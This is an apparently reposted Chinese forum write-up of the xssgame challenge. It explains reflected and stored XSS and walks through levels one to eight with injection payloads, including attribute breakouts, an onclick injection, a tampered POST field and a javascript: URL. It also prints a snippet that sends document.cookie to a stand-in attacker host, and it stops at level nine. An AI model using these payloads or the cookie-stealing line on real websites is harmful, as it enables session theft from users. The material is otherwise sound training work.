论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
IOT
[21084] 2020-06-16_xssgame挑战笔记
文档创建者:
s7ckTeam
浏览次数:
9
最后更新:
2025-01-18
IOT
9 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2020-06-16_xssgame挑战笔记
x
s
s
g
a
m
e
挑
战
笔
记
L
e
m
o
n
S
e
c
2
0
2
0
-
0
6
-
1
6
概
述
概
述
X
S
S
攻
击
是
W
e
b
攻
击
中
最
常
见
的
攻
击
方
法
之
一
,
它
是
通
过
对
网
页
注
入
可
执
行
代
码
且
成
功
地
被
浏
览
器
执
行
,
达
到
攻
击
的
目
的
,
形
成
了
一
次
有
效
X
S
S
攻
击
,
一
旦
攻
击
成
功
,
它
可
以
获
取
用
户
的
联
系
人
列
表
,
然
后
向
联
系
人
发
送
虚
假
诈
骗
信
息
,
可
以
删
除
用
户
的
日
志
等
等
,
有
时
候
还
和
其
他
攻
击
方
式
同
时
实
施
比
如
S
Q
L
注
入
攻
击
服
务
器
和
数
据
库
、
C
l
i
c
k
劫
持
、
相
对
链
接
劫
持
等
实
施
钓
鱼
,
它
带
来
的
危
害
是
巨
大
的
,
是
w
e
b
安
全
的
头
号
大
敌
。
攻
击
的
条
件
攻
击
的
条
件
实
施
X
S
S
攻
击
需
要
具
备
两
个
条
件
:
一
、
需
要
向
w
e
b
页
面
注
入
恶
意
代
码
;
二
、
这
些
恶
意
代
码
能
够
被
浏
览
器
成
功
的
执
行
。
根
据
根
据
X
S
S
攻
击
的
效
果
可
以
分
为
几
种
类
型
攻
击
的
效
果
可
以
分
为
几
种
类
型
第
一
、
X
S
S
反
射
型
攻
击
,
恶
意
代
码
并
没
有
保
存
在
目
标
网
站
,
通
过
引
诱
用
户
点
击
一
个
链
接
到
目
标
网
站
的
恶
意
链
接
来
实
施
攻
击
的
。
第
二
、
X
S
S
存
储
型
攻
击
,
恶
意
代
码
被
保
存
到
目
标
网
站
的
服
务
器
中
,
这
种
攻
击
具
有
较
强
的
稳
定
性
和
持
久
性
,
比
较
常
见
场
景
是
在
博
客
,
论
坛
等
社
交
网
站
上
,
但
O
A
系
统
,
和
C
R
M
系
统
上
也
能
看
到
它
身
影
,
比
如
:
某
C
R
M
系
统
的
客
户
投
诉
功
能
上
存
在
X
S
S
存
储
型
漏
洞
,
黑
客
提
交
了
恶
意
攻
击
代
码
,
当
系
统
管
理
员
查
看
投
诉
信
息
时
恶
意
代
码
执
行
,
窃
取
了
客
户
的
资
料
,
然
而
管
理
员
毫
不
知
情
,
这
就
是
典
型
的
X
S
S
存
储
型
攻
击
。
X
S
S
攻
击
能
做
些
什
么
攻
击
能
做
些
什
么
1
.
窃
取
c
o
o
k
i
e
s
,
读
取
目
标
网
站
的
c
o
o
k
i
e
发
送
到
黑
客
的
服
务
器
上
,
如
下
面
的
代
码
:
2
.
读
取
用
户
未
公
开
的
资
料
,
如
果
:
邮
件
列
表
或
者
内
容
、
系
统
的
客
户
资
料
,
联
系
人
列
表
等
等
,
如
代
码
。
X
S
S
C
h
a
l
l
e
n
g
s
闯
关
第
一
关
第
一
关
第
一
关
很
简
单
什
么
都
不
用
编
码
直
接
输
入
p
a
y
l
o
a
d
就
会
弹
窗
v
a
r
i
=
d
o
c
u
m
e
n
t
.
c
r
e
a
t
e
E
l
e
m
e
n
t
(
"
i
m
g
"
)
;
d
o
c
u
m
e
n
t
.
b
o
d
y
.
a
p
p
e
n
d
C
h
i
l
d
(
i
)
;
i
.
s
r
c
=
"
h
t
t
p
:
/
/
w
w
w
.
h
a
c
k
e
r
s
e
r
v
e
r
.
c
o
m
/
?
c
=
"
+
d
o
c
u
m
e
n
t
.
c
o
o
k
i
e
;
<
s
c
r
i
p
t
>
a
l
e
r
t
(
d
o
c
u
m
e
n
t
.
d
o
m
a
i
n
)
;
<
/
s
c
r
i
p
t
>
第
二
关
第
二
关
F
1
2
看
下
源
码
,
这
里
提
示
说
要
闭
合
上
一
个
标
签
。
所
以
也
很
简
单
,
直
接
"
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
d
o
c
u
m
e
n
t
.
d
o
m
a
i
n
)
<
/
s
c
r
i
p
t
>
第
三
关
第
三
关
这
里
很
明
显
在
b
o
x
中
进
行
x
s
s
。
看
似
只
有
这
几
个
选
项
实
际
上
是
p
o
s
t
传
参
的
,
可
以
b
p
抓
包
修
改
。
也
可
以
在
e
l
e
m
e
n
t
里
面
改
。
加
入
<
s
c
r
i
p
t
>
a
l
e
r
t
(
d
o
c
u
m
e
n
t
.
d
o
m
a
i
n
)
<
/
s
c
r
i
p
t
>
第
四
关
第
四
关
这
里
通
过
提
示
可
以
知
道
有
转
义
但
是
可
以
看
到
h
i
d
e
n
这
p
3
也
会
p
o
s
t
上
去
,
我
们
在
p
o
s
t
上
面
做
文
章
p
1
=
1
2
3
&
p
2
=
J
a
p
a
n
&
p
3
=
"
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
d
o
c
u
m
e
n
t
.
d
o
m
a
i
n
)
<
/
s
c
r
i
p
t
>
通
过
抓
包
提
交
p
3
第
五
关
第
五
关
输
入
的
时
候
发
现
长
度
受
限
制
,
F
1
2
查
看
源
码
;
这
里
设
置
了
长
度
。
但
是
也
不
难
,
初
学
c
t
f
的
人
应
该
都
遇
到
过
这
个
情
况
,
改
掉
m
a
x
l
e
n
g
t
h
就
行
了
。
我
直
接
改
成
了
1
5
0
然
后
输
入
:
"
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
d
o
c
u
m
e
n
t
.
d
o
m
a
i
n
)
<
/
s
c
r
i
p
t
>
第
六
关
第
六
关
输
入
"
>
<
发
现
<
>
被
过
滤
这
里
我
们
换
个
思
路
,
既
然
闭
合
不
了
就
顺
着
他
的
意
思
,
给
他
加
个
属
性
。
p
a
y
l
o
a
d
:
"
o
n
c
l
i
c
k
=
a
l
e
r
t
(
d
o
c
u
m
e
n
t
.
d
o
m
a
i
n
)
i
d
=
"
a
触
发
后
弹
窗
第
七
关
第
七
关
这
里
可
以
知
道
和
上
节
有
点
相
似
。
但
是
按
照
上
节
的
p
a
y
l
o
a
d
试
试
呢
?
这
里
我
们
可
以
看
到
依
然
可
以
弹
窗
。
但
是
和
上
节
不
同
的
地
方
就
是
v
a
l
u
e
。
上
节
中
v
a
l
u
e
并
没
有
值
,
而
这
里
有
了
。
说
明
什
么
?
这
里
对
"
进
行
了
过
滤
,
所
以
这
里
的
"
能
正
确
出
现
在
框
里
面
,
当
作
v
a
l
u
e
的
值
。
上
节
中
没
有
过
滤
"
符
号
所
以
v
a
l
u
e
值
是
空
。
第
八
关
第
八
关
这
里
看
到
提
示
说
用
j
a
v
a
s
c
r
i
p
t
协
议
。
这
里
没
有
什
么
过
滤
直
接
x
s
s
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
d
o
c
u
m
e
n
t
.
d
o
m
a
i
n
)
第
九
关
第
九
关
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
IOT